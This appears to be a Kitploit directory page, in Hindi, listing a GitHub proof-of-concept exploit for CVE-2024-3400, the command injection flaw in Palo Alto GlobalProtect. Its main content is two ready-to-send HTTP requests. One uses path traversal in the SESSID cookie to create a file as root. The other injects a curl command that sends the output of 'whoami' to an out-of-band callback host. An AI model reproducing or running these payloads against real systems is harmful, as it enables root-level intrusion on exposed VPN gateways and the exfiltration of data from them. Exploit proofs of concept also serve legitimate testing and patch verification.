Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-3400 — CVE-2024-3400 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो GlobalProtect VPN में Palo Alto OS कमांड इंजेक्शन है। यह क्राफ्टेड HTTP अनुरोधों के माध्यम से फ़ाइल निर्माण और आउटबाउंड कमांड निष्पादन प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/h4x0r-dz/cve-2024-3400
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubh4x0r-dz/cve-2024-3400

CVE-2024-3400

CVE-2024-3400 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो GlobalProtect VPN में Palo Alto OS कमांड इंजेक्शन है। यह क्राफ्टेड HTTP अनुरोधों के माध्यम से फ़ाइल निर्माण और आउटबाउंड कमांड निष्पादन प्रदर्शित करता है।

रिपॉजिटरी देखें
1612542 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-3400

CVE-2024-3400 Palo Alto OS कमांड इंजेक्शन

यह HTTP अनुरोध भेजें:

root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

image

आप सर्वर पर रूट एक्सेस के साथ hellome1337.txt फ़ाइल बनाएंगे

अब यदि आप फ़ाइलों तक पहुँचने का प्रयास करते हैं, तो आपको 404 के बजाय 403 प्राप्त होना चाहिए

image

कमांड इंजेक्शन

root@kitploit:~
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

अधिक जानकारी: https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis

https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
टूल डाउनलोड करें